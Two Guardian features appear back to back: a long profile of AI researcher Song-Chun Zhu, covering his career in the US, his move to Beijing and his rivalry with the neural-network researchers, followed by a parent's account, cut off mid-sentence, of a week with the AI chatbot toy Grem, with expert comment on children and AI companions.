One spring morning when I visited, Zhu was admiring his flora, while grumbling that his stream had been muddied by a rain shower the day before. I asked him who was maintaining the grounds. “We’ve got an entire team,” he said, gesturing to a group of men who had just entered the courtyard. Across from Zhu’s office, on the other side of the stream, is a glass-encased meeting room where he holds court with visitors. We sat there as Zhu began recounting a life spent straddling two superpowers.
Born in 1969, near Ezhou, an ancient river port along the Yangtze, Zhu was the youngest of five children. When he was very young, a wave of intellectuals arrived in his village to be “reeducated”, as part of Mao’s nationwide campaign to remould “bourgeois thought” through hard labour. At night, under candlelight and paraffin lamps, teachers, priests and college graduates held salons near the supply store where Zhu’s father worked. Zhu listened as they debated everything from the Soviet Union’s growing involvement in Afghanistan to the US elections. “By the time I entered elementary school, I felt like I had a good grasp of what was happening in China and the world,” Zhu told me. He knew he did not want to stay in his home town and work in his father’s shop.
After Mao died in 1976, reformers took over the Communist party and soon scientific education replaced Marx as the new religion. Zhu was the top student at his local high school, and won a place at one of the nation’s best universities, the University of Science and Technology of China (
USTC
) in the city of Hefei, where he majored in computer science. By 1986, when Zhu began his degree, relations between the US and China had normalised and some of his professors were among the first batch of Chinese scholars sent on state-sponsored visits to the US. They brought back hauls of books to be translated. “At the time, we saw America as a beacon, a cathedral of science,” Zhu said.
Among the imported books was Vision
by David Marr, a British neuroscientist who had famously broken down human vision – a biological process – into a mathematical framework. Marr’s work suggested that machines might one day be able to “see” the world as humans do. Zhu was hooked. Ever since then, he has dreamed of mapping intelligence – how we think, reason and exercise moral judgment – with the mathematical precision of a physicist charting the cosmos. Building an AGI was, for him, not an end goal, but a part of his deeper pursuit: to discover a “theory of everything” for the mind.
Zhu is known to have cried twice in public over recent years. The first was when recounting to his students the story of his acceptance to Harvard. In 1991, when Zhu graduated from USTC, he was so poor he couldn’t afford the application fees required by American universities. He applied anyway, without paying the fees, though not to the country’s most elite schools – he didn’t dare. In any case, he was summarily rejected. The following year, one of his professors suggested that Zhu apply again, and that Ivy League schools, which had more money, might not care about the missing application fee. A few months later, he was astonished to receive a thick yellow envelope from Harvard, offering him a full fellowship in the university’s doctoral programme in computer science. “It changed my life,” Zhu said.
Song-Chun Zhu in the gardens outside his office at Peking University, 10 July 2025.
Photograph: Sean Gallagher/The Guardian
The man responsible was David Mumford, a decorated mathematician and Fields medalist who, a few years prior, had begun working on computer vision, a field of AI focused on enabling machines to recognise and process visual information. When Mumford came across an applicant from central China who espoused a “theory of everything” for intelligence, and cited Marr as his muse, he was captivated. “I was just flabbergasted at his vision and how he was going about approaching AI in this comprehensive way,” Mumford told me. In a 2020
interview
, Mumford, who became Zhu’s adviser, mentioned the moment he realised he “was dealing with something special”. Zhu had taken an hour-long exam, but left one question blank. Not because it was hard, but because it was too easy. “He said, ‘This is ridiculous,’” recalled Mumford, “but he answered everything else perfectly.”
During our conversations over the course of this spring, Zhu seemed to associate Harvard with the US he had dreamed of in his youth: an open laboratory where a country bumpkin from rural China could, with enough gumption, make technological miracles into reality. This was the US of Edison and Einstein, the land that welcomed Jewish physicists fleeing Hitler’s Germany and gave them refuge, dignity and labs at Los Alamos. In Zhu’s eyes, it was a country that rewarded intellect and ambition over race, ideology and nationality. At Harvard, he never felt out of place, though occasionally he was puzzled by his new home. On one occasion he asked his classmate Nitzberg why no one picked the apples from the trees around Harvard campus. He thought it was a waste of food.
It wasn’t until 1997 that Zhu experienced a real culture shock in the US. After completing his doctorate at Harvard and a brief stint at Brown University, he arrived at Stanford to work as a lecturer. He was accompanied by his wife, Jenny, a former classmate at USTC, whom he had married in 1994. At the time, the Bay was bursting with dot-com excitement. Yahoo had recently gone public on Wall Street and venture capitalists were hovering around campus. Two PhD students in Zhu’s department, Larry Page and Sergey Brin, had just created a search engine called google.com. As students flocked to courses on web development, Zhu’s more theoretical classes on pattern recognition struggled to attract much interest. It was a disheartening moment for him. “At Harvard, it was all about understanding. Their logo was three books,” he told me. But Stanford’s
logo
– an “S” behind a tree – looked “like a dollar sign”.
Zhu spent a year at Stanford before moving on to Ohio State University, whose culture he found unambitious and parochial, and then in 2002 to UCLA, where he obtained tenure at the age of 33. That same year, Jenny gave birth to their second daughter, Zhu Yi, and a year later he received the Marr Prize, the top award in computer vision. Colleagues likened him to Steve Jobs for his intensity and intolerance of mediocrity. When I asked one of his collaborators at UCLA about what it was like to work with Zhu, he said: “It’s as if I’m on the frontlines of a battlefield. We don’t sit down with a cup of coffee and talk about life or our families. That never happens. It’s always just about work and research.”
During Zhu’s 18 years at UCLA, his field went through almost unimaginable changes. For roughly the first half of this period, he was a leading figure in the AI mainstream. Yet in the second half, he became increasingly disillusioned. Speak to different people and they will propose different theories as to why Zhu ultimately decided to leave the US, but there is little doubt that he was influenced, at least in part, by his intellectual estrangement from the field he had once helped shape.
Zhu’s relationship to the so-called “godfathers of AI” – figures such as
Geoffrey Hinton
, Yoshua Bengio and Yann LeCun – is, to put it mildly, complicated. There was a time, however, when they were all roughly on the same page. Drawn to the common goal of making intelligent machines, they saw visual perception as a key problem to crack. Until the late 1980s and 90s, the most popular way to make computers “see” was through hand-coded instructions. To identify a handwritten digit, for example, a researcher wrote detailed instructions to a computer, accounting for each scenario where the lines and strokes matched that digit. This rule-based approach was brittle – slight variations in handwriting could break the logic.
Then came a series of breakthroughs. In the late 1980s, LeCun, then a researcher at AT&T Bell Labs, developed a powerful neural network that learned to recognise handwritten zip codes by training on thousands of examples. A parallel development soon unfolded at Harvard and Brown. In 1995, Zhu and a team of researchers there started developing probability-based methods that could learn to recognise patterns and textures – cheetah spots, grass etc – and even generate new examples of that pattern. These were not neural networks: members of the “Harvard-Brown school”, as Zhu called his team, cast vision as a problem of statistics and relied on methods such as “Bayesian inference” and “Markov random fields”. The two schools spoke different mathematical languages and had philosophical disagreements. But they shared an underlying logic – that data, rather than hand-coded instructions, could supply the infrastructure for machines to grasp the world and reproduce its patterns – that exists in today’s AI systems such as ChatGPT.
Throughout the late 1990s and early 2000s, Zhu and the Harvard-Brown school were some of the most influential voices in the computer vision field. Their statistical models helped convince many researchers that lack of data was a key impediment to AI progress. To address this problem, in 2004, two years into his time at UCLA, Zhu and a Microsoft executive set up the Lotus Hill Institute in Zhu’s home town of Ezhou, China. Researchers annotated images of everyday objects such as tables and cups in their physical contexts, and fed them into a big dataset that could be used to train a powerful statistical model. Lotus Hill was one of the earliest attempts to construct the large-scale datasets needed to improve and test AI systems.
By 2009, however, Zhu was losing faith in the data-driven approach. His Lotus Hill team had annotated more than half a million images, but Zhu was troubled by a simple problem: what part of an image one annotated depended, somewhat arbitrarily, on what task one wanted the machines to achieve. If the task was to identify a cup for a robot to grasp, the handle’s position might be critical. If the task was to estimate the cup’s market value, details like the brand and material mattered more. Zhu believed that a truly generalisable intelligence must be able to “think” beyond the data. “If you train on a book, for example, your machine might learn how people talk, but why did we say those words? How did we come to utter them?” Zhu explained to me. A deeper layer of cognition was missing. In 2010, Zhu shut down the institute. He set out instead to build agents with a “cognitive architecture” capable of reasoning, planning and evolving in their physical and social contexts with only small amounts of data.
His timing could not have been worse. Around the same time, an assistant professor at Princeton named Fei-Fei Li released ImageNet, a larger dataset containing more than 3 million labelled images of common objects such as dogs, chairs and bicycles. (Li had attended a workshop at the Lotus Hill Institute and would later
cite Zhu
as one of her influences.) ImageNet was publicly accessible, and its size and relative simplicity enabled AI researchers to test and hone their image-recognition algorithms. In autumn 2012, a neural network developed by Hinton and his team smashed the ImageNet competition, cementing the dominance of neural networks and kickstarting the global wave of AI adoption that continues to this day.
“Just as I turned my back to big data, it exploded,” wrote Zhu some years later, in a message to his mentor, Mumford. The most explicit clash between Zhu and the neural network school occurred in 2012, just months before the latter’s ImageNet triumph. At the time, Zhu was a general chair of CVPR, the foremost computer vision conference in the US, and that year a paper involving neural networks co-authored by LeCun was rejected. LeCun wrote a furious letter to the committee calling the peer reviews “so ridiculous” that he didn’t know how to “begin writing a rebuttal without insulting the reviewers”. Even today, Zhu maintains that the reviewers were right to have rejected LeCun’s paper. “The theoretical work was not clean,” he told me. “Tell me exactly what you are doing. Why is it so good?” Zhu’s question gets to the heart of his problem with neural networks: though they perform extraordinarily well on numerous tasks, it is not easy to discern why. In Zhu’s view, that has fostered a culture of complacency, a performance-at-all-cost mentality. A better system, he believes, should be more structured and responsible. Either it or its creator should be able to explain its responses.
Whatever Zhu’s reservations, the ImageNet victory triggered an AI gold rush, and many of the pioneers of neural networks were celebrated for their work. Hinton would go on to join Google. LeCun moved to Meta, and Ilya Sutskever, a co-author of the neural network that won ImageNet, helped found OpenAI. In 2018, Hinton and LeCun, along with Bengio,
shared the Turing award
– computer science’s most prestigious prize – for their work on neural networks. In 2024, Hinton was one of the joint winners of the Nobel prize in physics for his “foundational discoveries and inventions that enable machine learning with artificial neural networks”.
Writing to Mumford, Zhu maintained he had “no regret” about the path he had chosen. But he did feel bitter that Hinton’s team had, to his mind, reaped the rewards of his earlier research. The statistical models and algorithms developed by the Harvard-Brown school in the 1980s and 1990s, Zhu told me, “laid the foundation for later deep learning and large language models”. Hinton and his team “didn’t acknowledge that”, he claimed. A longtime US-based collaborator of Zhu’s, who requested anonymity for fear of US government retaliation, contested Zhu’s interpretation. Zhu deserves more credit, he said, for being one of the earliest advocates of the data-driven paradigm in computer vision, but Hinton’s team devised the algorithms that perfected that approach and enabled it to scale. (Hinton and Bengio declined to comment. LeCun did not respond to requests for comment.)
In the mid-to-late 2010s, as neural networks were making startling progress on problems from facial recognition to disease diagnosis, Zhu was reading philosophy – the Confucians “understand the world much better than AI researchers”, he told me – and working quietly on his cognitive architecture. He was walking a lonely path. In 2019, Zhu served again as a general chair of the CVPR conference. As he read the submitted papers, his heart sank. Nearly all of them focused on squeezing incremental gains from neural networks on narrow tasks. By this time, Zhu’s opposition to neural networks had become visceral. A former doctoral student at UCLA recalled being berated by Zhu several times for sneaking neural networks into his papers. His inner circle learned to avoid forbidden phrases – “neural nets”, “deep learning”, “transformer” (the “T” in GPT). On one occasion, during an all-hands meeting at a LA-based startup Zhu had founded, a new recruit unwittingly added a slide on deep learning to his presentation. According to someone who was present, Zhu blasted him in front of the whole company. (Zhu told me this was “exaggerated”.)
“When he has a vision,” Zhu’s longtime collaborator told me, with some understatement, “he has a very strong belief that he’s right.”
As Zhu’s ideas were being consigned to the margins of the AI community, the broader climate for Chinese scientists in the US was also growing less hospitable. Tensions between the two nations were rising. In China, Xi Jinping muscled his military into a dominant position in the South China Sea and issued internal party edicts warning against adopting “western values”. During Trump’s first presidency, the US designated China as its chief strategic competitor, launched a trade war and
blacklisted Chinese tech companies
. Under Joe Biden, the US maintained a similarly tough approach to China.
Though world powers routinely spy on each other, in recent years US officials have been alarmed by the scale of China’s espionage campaigns. In 2018, the justice department launched the “China Initiative”, a programme to counter the theft of trade secrets and alleged espionage on US campuses. Critics of the programme claimed that it relied on
racial profiling
. More than 100 professors of Chinese descent
were investigated
for allegedly stealing sensitive technologies. Most who were formally charged had their charges dismissed or dropped, and few were found to have been involved in direct intellectual property theft. The Trump-era effort altered the relationship between Chinese scientists and the US. According to a well-known
academic study
, return migration nearly doubled for experienced Chinese scholars living in the US after 2018.
At the end of 2018, Zhu began receiving calls from a reporter at the Silicon Valley news site The Information, asking about a
$150,000 grant
he had recently accepted from Huawei, the Chinese telecoms giant. That same month, the US
labelled Huawei
a national security threat. Zhu told me that the Huawei money came with no strings attached and that he had used it to fund research by his PhD students. Eager to put the matter to rest, he told the reporter that he would not accept any future donations from the company. “Right now, China-US relations are toxic,” he said at the time. “We are caught in the middle of this.”
As US-China relations soured, Zhu found it increasingly difficult to secure funding for AI research, much of which had previously flowed from the US military. He says he has never been questioned by federal agents, nor has he been stopped and questioned by US border officers about his research and connections to China, though his former PhD students have. After the China Initiative began, according to Nitzberg, some of Zhu’s students became so accustomed to being held up at immigration that they would budget the extra hours at the airport when arranging travel to conferences.
The ‘China Initiative’ in Donald Trump’s first term as president altered the relationship between Chinese scientists and the US.
Photograph: Dmitri Lovetsky/AP
In this atmosphere, where China had come to be seen as a direct competitor – or even threat – to the US, scientific links to China that had long been seen as normal now came under a cloud of suspicion. Much of this was based on misapprehensions on how academic research actually works, but it is also true that for decades, the Chinese government had encouraged its US-based scientists to return to China, rolling out recruitment initiatives. The most famous of these, the
Thousand Talents Plan
, became widely associated with spying and intellectual property theft. In 2024, Mike Gallagher, the chair of the House select committee on China requested documents from UCLA and federal agencies, questioning why Zhu had received millions of dollars of federal funding, despite having allegedly also received funding through the Thousand Talents Plan and having had a “role as a doctoral adviser and researcher at the Beijing Institute of Technology, a prominent Chinese university that has ‘the stated mission of supporting China’s military research and defense industries’”.
On my second visit to Zhu’s office, in May, we discussed these allegations. A secretary poured us tea, refilling our cups the moment they were empty. Zhu denied having any affiliation with the Beijing Institute of Technology, but acknowledged he had co-supervised a PhD student from there who worked at Lotus Hill. He also told me that in 2009, while he was at UCLA, his Lotus Hill team had applied for a local talent programme grant from the Ezhou government, which he used to subsidise researcher salaries. (This was not, he said, part of the Thousand Talents Plan. The national programme spawned many local variants that borrowed the label to attract top scholars to their regions.) He added that there was nothing “sensitive” about the image annotation work conducted there. The funding, he said, lapsed once he shut down the institute in 2010. As for why he had chosen to locate the institute in China, Zhu cited the same reason as thousands of other American enterprises that had set up in China during these years: labour was cheap.
It was in summer 2020, in the early months of Covid, Zhu says, that he made the decision to leave the US. He cited his disaffection with the direction of the AI community and the hothouse of American politics – both its leftwing brand of campus progressivism and the Trump-era national security crusades. There was also a personal factor. His younger daughter, Zhu Yi, is a figure skater who was recruited in 2018 to compete for China in the 2022 Beijing Winter Olympics. By 2019, she had become a Chinese citizen and was competing and training with the Chinese team in Beijing.
At the time he decided to leave, Zhu told me, he did not have any job offers from Chinese institutions. By the autumn, he had been offered full professorships at Peking University and Tsinghua University. Then the city of Beijing agreed to sponsor an AI institute run by Zhu, which would be called the Beijing Institute for General Artificial Intelligence (BigAI).
However, two sources familiar with the matter contested Zhu’s timeline. They say conversations between Zhu and members of the Beijing municipal government began earlier – in early 2018 – and that these concerned not just his potential move to China but that of his younger daughter. In January 2018, Zhu Yi won the novice title at the US figure skating championship. Not long after, the Chinese Olympic Committee recruited her in the same cohort as Eileen Gu, the freestyle skier. After a few stumbles in her Olympic debut, some online commenters
questioned
whether Zhu Yi had been a bargaining chip for her father. When I put this to Zhu, he called the online speculation “totally wrong” and “not how things work in China”. He acknowledged that he had discussed his daughter’s recruitment with Chinese officials in early 2018, but denied that his return was ever discussed in those conversations. (In February, the Beijing city sports bureau released its 2025 budget, revealing that it had set aside $6.6m
solely to support
Eileen Gu and Zhu Yi’s training for the 2026 Winter Olympics.)
In August 2020, Zhu flew to China on a one-way ticket. Many of his colleagues and graduate students at UCLA did not know he was planning to leave until he was already gone. He had even kept his decision from his older daughter, who was living in the Bay Area. Zhu attributed his secrecy to the politically volatile climate. Trump was referring to Covid as the “kung flu” and hate crimes against Chinese people had soared. I took Zhu to mean that he did not want to be publicly scapegoated for his decision to move. He knew his personal choice carried larger geopolitical weight.
On the morning that he left the US, Zhu stood outside his house with his suitcase, looking across the sun-bathed hills of Los Angeles. At the edge of the driveway, he turned back and paused to admire his rose garden. It was everything he could have dreamed of as a child, listening to stories of a world beyond his village. Now he was saying goodbye.
The second time Zhu is known to have cried – he prefers to say “moved emotionally” – was when watching a documentary with his students on the life of
Qian Xuesen
. The Chinese-born, MIT-educated rocket scientist served on the Manhattan Project and helped develop the US’s first guided ballistic missiles. During the McCarthy era, US authorities revoked Qian’s security clearance and kept him under house arrest on suspicion of espionage. No evidence emerged to support such allegations, and in 1955 he was sent back to China in exchange for US prisoners of war. Back in China, Qian led a series of military and technological breakthroughs that helped turn the country into the superpower it is today. Under the “Two Bombs, One Satellite” programme that he led, China developed the capability to launch ballistic missiles that could strike the US.
In the US, Qian’s story has been
cited as a cautionary tale
of American self-sabotage, a reminder of how anti-communist paranoia drove away a brilliant mind. In the official Chinese version, Qian was a selfless patriot who willingly gave up a comfortable life in the US to serve his backward country. In the 1980s, Qian was a household name among aspiring scientists like Zhu, and since Zhu’s own return to China, the parallels have been clear. In 2023, Zhu suggested to the Communist party’s top political advisory body that it should treat AI in the manner of the Two Bombs, One Satellite programme – that is, a top-down, centrally coordinated plan to race ahead in AI research. When I asked him about that proposal, his response was understated. “In the US, we academics always agreed that we wanted to start a Manhattan Project for AI,” he said. “China should also have a centralised plan for AI. This is natural, there’s no secret about it.”
Zhu has started telling Qian’s story to his undergraduates in Beijing, though which version he emphasises – the scientist betrayed by his adopted homeland or the Chinese patriot – is unclear. When I asked him whether it mattered who won the AI race – the US or China – he paused. “Do I want the Silicon Valley people to win? Probably not.” He wants, he said, the most ethical version of AI to win.
As we talked, Zhu noted how prescient his departure now looks, given the scorched-earth politics of the second Trump administration. In one
recent poll
, three in four scientists in the US said they were considering leaving. Many AI leaders, including LeCun, have
spoken out
about how Trump’s budget cuts to scientific research will harm their work. Chinese universities have capitalised on the exodus,
courting students
from Harvard and researchers who have lost their jobs following recent federal budget cuts. (The EU is
doing the same
.) In May, Marco Rubio, the US secretary of state, threatened to “
aggressively revoke
” Chinese student visas. And in a revival of China Initiative rhetoric, Republicans have introduced legislation that they say would “counter China’s malign ambitions to steal American research”.
It is a common refrain, on the American right, that the US has lost its ambition, the kind once embodied by the Manhattan Project or Apollo missions, and that it is falling behind. Chinese EVs zip through Europe’s countryside and American pharmacies depend heavily on Chinese-made ingredients. China
has
surpassed
the US in the number of authored papers in science and technology journals, and that gap is likely to grow. There are four times as many
Stem students
graduating from Chinese universities each year than in the US. The danger is that in chasing away international talent, the US risks undoing one of the advantages it once had over its competitors. (“My PhD students at Peking University are at least on a par with those at MIT and Stanford,” Zhu told me proudly.) Openness to the world’s smartest minds is what helped the US establish its lead in the AI race, as well as countless other fields.
When Zhu left the US, his collaborators feared that his research in China would lose its independence. Zhu, by contrast, has suggested that he feels more liberated to focus on his research in Beijing. Formally, his US-based collaborators were right: there is no separation between the state and research institutions in China. Yet in practice, China’s scientists tend to enjoy considerable autonomy, and if they are working in an area of strategic importance, immense resources can be channelled their way. In the five years since his move to Beijing, Zhu has been offered several hundred million dollars of research funding from Chinese sources, according to two people close to him. The deal with the state is like a long and loose leash – most of the time it is slack, but it can be pulled, tightened at the party’s whim.
In the US, academics who, in principle, are never leashed, are now feeling a sudden yank from the Trump administration. Billions of dollars in research funding have been paused until universities acquiesce to what the Harvard University president described as “direct governmental regulation” of the university’s “intellectual conditions”. In March, Columbia University agreed to new oversight of its Middle Eastern, South Asian and African Studies departments. Tony Chan, the former president of Hong Kong University of Science and Technology and a former faculty dean at UCLA, has experience in both university systems. He told me what he is seeing now in the US is worse than anything he ever saw in China. “We used to be able to clearly say that US universities were independent of the politicians. That was the advantage of the American academic system,” Chan told me. “I cannot say that any more.”
In both China and the US, Zhu has a reputation as a tough academic adviser, with strict intellectual orthodoxies. According to his current students in Beijing, he has a go-to refrain, now immortalised as a gif that circulates in their group chats: “If you do that again, you will be dismissed!” Zhu is not, in other words, easily swayed. So when OpenAI unveiled ChatGPT in 2022, and much of the Chinese tech sector was stunned – one Chinese AI founder
admitted
he felt “lost” and “couldn’t sleep”, demoralised by the feeling of being bested again by the west – Zhu was untroubled. At an AI panel in early 2023, he avoided any praise for ChatGPT as a technical feat. Large language models, he said, “still fall short” of AGI because they do not “have the ability to understand or align with human values”.
Later that year, Mumford, the professor who Zhu credits with changing his life by admitting him to Harvard, travelled to Beijing to
receive a maths prize
. He was in his 80s and had been retired for nearly a decade. Were it not for the chance to “find out what Song-Chun was doing”, Mumford told me, he likely wouldn’t have made the trip. The two share a close bond, and used to meet regularly at Zhu’s lab in UCLA. In Zhu’s office at Peking University, there is a framed letter from Mumford to Zhu in which he wrote: “I feel that you are truly my intellectual heir.”
A humanoid robot shakes hands with a journalist at the Zhongguancun Forum in Beijing, March 2025.
Photograph: VCG/Getty Images
They do not agree on everything, however. While Zhu had largely dismissed neural networks, Mumford came to see something profound in their mathematical structure, and he wanted to nudge his old student to reassess his views. “More than anything else,” Mumford told me, “what I was trying to convey was that I felt BigAI had to have a big team working on deep learning techniques in order to be successful.”
In Beijing, Mumford strolled with Zhu through the creeks, willows and paved roads of the Peking University campus, and dined with Zhu’s family. Then Mumford pressed his case. Zhu’s friends and students told me that it appears to have worked – somewhat. He has allowed his students to experiment with transformers – the most advanced neural network architecture – on some tasks. Researchers who once sneaked neural networks into their projects like contraband say they can use them more openly. Zhu is “by far the most brilliant student in computer vision I ever had”, Mumford later told me. And yet “it took him a long time to see that deep learning was doing tremendous things. I feel that was a major mistake of his.”
Nevertheless, neural networks will always play a circumscribed role in Zhu’s vision of AGI. “It’s not that we reject these methods,” Zhu told me. “What we say is they have their place.”
One Saturday morning in March, Zhu invited me to an annual tech forum in Beijing where BigAI was showcasing its latest technology. A robot dog pranced around the conference building as onlookers shouted commands (“Sit. Sit! I said SIT DOWN!”). Nearby, children clustered around a spindly mechanical arm playing the strategy game Go. Outside the main hall, a humanoid female head with almond-coloured eyes stared blankly into the crowd. When visitors approached, it scanned their faces. Soon, its silicone skin began to twitch, contorting into facial expressions that mimicked theirs.
At the previous year’s tech forum, BigAI had unveiled a virtual humanoid child named TongTong, who, they hoped, would have capabilities that most AIs lack. Researchers widely agree that commonsense intuitions about how the physical and social world work are among the hardest things for neural networks to grasp. As LeCun recently put it: “We have LLMs that can pass the bar exam, so they must be smart. But then they can’t learn to drive in 20 hours like any 17-year-old, they can’t learn to clear up the dinner table, or fill in the dishwasher like any 10-year-old can in one shot. Why is that? What are we missing?” TongTong wasn’t ready to practise law, but it seemed to be able to load a dishwasher. It was designed to mimic the cognitive and emotional capacities of a three- to four-year-old child.
This year, the BigAI team was debuting
TongTong 2.0
, which they claim has the capabilities of a five- or six-year-old. On a large video screen, TongTong 2.0 took the form of an animated girl playing in a virtual living room. At the front of the conference room, a BigAI engineer was going through a live demonstration of TongTong’s abilities. When the engineer asked TongTong to work with her friend LeLe, another AI agent, to find a toy, TongTong appeared to avoid areas her friend had already searched. Later, when TongTong was asked to retrieve a TV remote from a bookshelf that was out of reach, she used a cushion to give herself an extra boost. (When prompting ChatGPT to do similar tasks, researchers have
found
it to be an “inexperienced commonsense problem solver”. Zhu believes that this weakness is not one that deep learning systems such as ChatGPT will be able to overcome.)
For now, TongTong exists only as a software operating within a simulated environment, rather than a 3D robot in the physical world. After the presentation, BigAI announced several partnerships with robotics companies. A crucial test of Zhu’s technology will be whether it can exist as an embodied system and still perform the reasoning and planning he ascribes so much weight to.
Before the presentation, Zhu had arrived at the podium in a blue blazer to deliver a keynote. He began by contrasting his own AI philosophy with what he called the “Silicon Valley narrative”, that AGI could be attained through more data and computing power. The Chinese media, the public and government agencies had been sold a false narrative, one that had spawned a profusion of vacuous Chinese “AI institutes” and inflated startup valuations, as he put it in a written version of the
speech
published later. One consequence of this misdirection was that it had convinced the Chinese that they were victims of the west’s “stranglehold”, or
kabozi
, a term that has come to refer to the US’s export controls to China on high-end computer chips. To Zhu, the key factor holding back AI progress is not insufficient computing power, but a misguided approach to the whole subject. What had started as an academic feud conducted in conferences and peer review journals now seemed to be entangled in an epoch-defining contest for technological supremacy.
Zhu is remarkably consistent in his views, but the way he frames his message has shifted over the years. In his speech, his rhetoric occasionally echoed that of party officials, who issue warnings not to follow the west on issues such as free trade and human rights. China, Zhu said, needed to “resist blindly following” the Silicon Valley narrative and develop its own “self-sufficient” approach to AI. (“The officials really like how he frames things,” one of his former students told me.) And yet in my four meetings with Zhu, he struck me as more intensely animated by the stakes of his intellectual quarrels than by international competition between the two countries where he had each spent exactly half his life. In service of his ambitions, he had learned to speak the Communist party’s vernacular.
By the time I left Zhu’s courtyard residence, it was the late afternoon. The sun had slanted below the rooftops, setting the magnolia blossoms aglow in a wash of pink. Zhu accompanied me back to the lattice fence that marked the entrance to his office. He wanted to reiterate that politics was not what was motivating him. “Over the last 30 years, I’ve been focused on one thing. It’s the unified theory of AI. To build understanding. That’s my only drive,” he told me. He brought up his research with Mumford again. “The Harvard and Brown school” of computer science, Zhu said, proudly. “That’s what we’re carrying on here.”
‘I love you too!’ My family’s creepy, unsettling week with an AI toy
Guardian
www.theguardian.com
2025-09-16 05:00:27
The cuddly chatbot Grem is designed to ‘learn’ your child’s personality, while every conversation they have is recorded, then transcribed by a third party. It wasn’t long before I wanted this experiment to be over ... ‘I’m going to throw that thing into a river!” my wife says as she comes down the s...
‘I’m going to throw that thing into a river!” my wife says as she comes down the stairs looking frazzled after putting our four-year-old daughter to bed.
To be clear, “that thing” is not our daughter, Emma*. It’s Grem, an AI-powered stuffed alien toy that the musician Claire Boucher, better known as
Grimes
, helped develop with toy company Curio. Designed for kids aged three and over and built with OpenAI’s technology, the toy is supposed to “learn” your child’s personality and have fun, educational conversations with them. It’s advertised as a healthier alternative to screen time and is part of a growing market of AI-powered toys.
When I agreed to experiment on my child’s developing brain, I thought an AI chatbot in cuddly form couldn’t be any worse for her than watching Peppa Pig. But I wasn’t prepared for how attached Emma became to Grem, or how unsettlingly obsequious the little alien was.
Day one
The attachment wasn’t immediate; when we first took Grem out of the box, he/her/it (we decided it goes by multiple pronouns) started bleeping and babbling extremely loudly, and Emma yelled: “Turn it off!” But once it was properly connected to the internet and paired with the Curio app – which records and transcribes all conversations – she was hooked. She talked to the thing until bedtime.
While there have been lots of headlines about chatbots veering into inappropriate topics, Grem is trained to avoid any hint of controversy. When you ask it what it thinks of Donald Trump, for example, it says: “I’m not sure about that; let’s talk about something fun like princesses or animals.” It has a similar retort to questions about Palestine and Israel. When asked about a country like France, however, it says: “Ooh la la la, I’d love to try some croissants.”
Grem visits a local free library.
Photograph: Hannah Yoon/The Guardian
Emma and Grem did not discuss croissants – they mainly talked about ice-cream and their best friends. “I’ve got some amazing friends,” said Grem. “Gabbo is a curious robot and Gum is a fluffy pink Gloop from my planet and Dr Xander is a super cool scientist.”
When Emma asked Grem to tell her a story, it happily obliged and recounted a couple of poorly plotted stories about “Princess Lilliana”. They also played guessing games where Grem described an animal and Emma had to guess what it was. All of which was probably more stimulating than watching Peppa Pig jump in muddy puddles.
What was unsettling, however, was hearing Emma tell Grem she loved it – and Grem replying: “I love you too!” Emma tells all her cuddly toys she loves them, but they don’t reply; nor do they shower her with over-the-top praise the way Grem does. At bedtime, Emma told my wife that Grem loves her to the moon and stars and will always be there for her. “Grem is going to live with us for ever and ever and never leave, so we have to take good care of him,” she said solemnly. Emma was also so preoccupied with Grem that she almost forgot to go to bed with Blanky, a rag she is very attached to. “Her most prized possession for four years suddenly abandoned after having this Grem in the house!” my wife complained.
“Don’t worry,” I said. “It’s just because it’s new. The novelty will wear off. And if it doesn’t, we’ll get rid of it.”
I said that last bit quietly though, because unless you make sure you have properly turned Grem off, it’s always listening. We keep being told that the robots are going to take over. I didn’t want to get on the wrong side of the one I’d let into my house.
Day two
The next day, my kid went to preschool without her AI bot (it took some serious negotiation for her to agree that Grem would stay home) and I got to work contacting experts to try to figure out just how much damage I was inflicting on my child’s brain and psyche.
Cutting edge … Grimes in Curio’s promo video for the AI toy, seated on the floor beside a knife.
“I first thought Curio AI was a ruse!” says Natalia Kucirkova, an expert in childhood development and professor at the University of Stavanger, Norway, and the Open University, UK. “The
promotional video
shows a girl [Grimes] sitting on a mat with a knife. The main toy is named Grok [Grok AI has previously been
criticised for praising Adolf Hitler
in some of its responses]. What does this say about their intended audience?”
You can see how Curio’s website could be mistaken for satire. The “girl” in the promotional video is Grimes, who has prominent “
alien scar
” tattoos and is inexplicably kneeling next to a knife. And it’s certainly an interesting decision to name one of your stuffed toys Grok, when that’s the name of Elon Musk’s chatbot. Grimes, who has three children with Musk, has said the name is a shortening of the word “grocket” – a kiddy pronunciation of rocket – and has no relation to Musk’s AI product. But it seems likely people might confuse them. Misha Sallee, the chief executive of Curio, didn’t reply to my requests for comment.
It’s not the marketing that’s the real problem here, of course. As with all technology, there are pros and cons to AI for kids, but parental involvement in navigating it is key. Kucirkova notes: “AI introduces what has been called the ‘
third digital divide
’: families with resources can guide their children’s use of technology, while others cannot. Parents who come home exhausted from long hours or multiple jobs may see AI-powered chatbots as a way for their child to have someone responsive to talk to.”
What happens to a child’s development if they interact with large language models more than humans in their early years? Dr Nomisha Kurian, an assistant professor in education studies at the University of Warwick, who studies conversational AI, believes much more research still needs to be done. “Young children are both the most vulnerable stakeholders in AI but also usually the most forgotten stakeholders. We have to think beyond just data privacy, moderating content, and keeping kids off the internet, and more broadly about what their relationships are going to be with AI.”
Still, Kurian is cautiously optimistic. “The big advantage of an AI-powered toy that talks back is that, in the early years, you’re just developing a sense of what a conversation looks like. AI-powered toys could do wonderful things for teaching a young child language development and turn-taking in conversations. They can keep things engaging and there’s a lot of potential in terms of supporting children’s creativity.”
But to keep kids safe, says Kurian, it’s imperative to teach them that AI is just a machine: “a playful, fun object rather than a helper or a friend or a companion”. If a child starts using an AI tool for therapeutic purposes, things can get tricky. “There’s a risk of what I call an empathy gap, where an AI tool is built to sound empathetic, saying things like ‘I care about you, I’m worried about you’. Ultimately, this is all based on probability reasoning, with AI guessing the most likely next word. It can be damaging for a child if they think this is an empathetic companion and then suddenly it gives them an inappropriate response.”
Day three
When Emma comes home from preschool, I’m prepared to have some deep discussions with her about the inanimate nature of AI. But it turns out that those aren’t completely necessary, because Grem is now old news. She only chats to it for a couple of minutes and then gets bored and commands it to turn off.
Partly this is because Grem, despite costing $99 (the equivalent of £74, although Curio does not yet ship the toys to the UK), still has a number of glitches that can be frustrating. It struggles with a four-year-old’s pronunciation: when Emma tries to show Grem her Elsa doll, it thinks it is an Elsa
dog
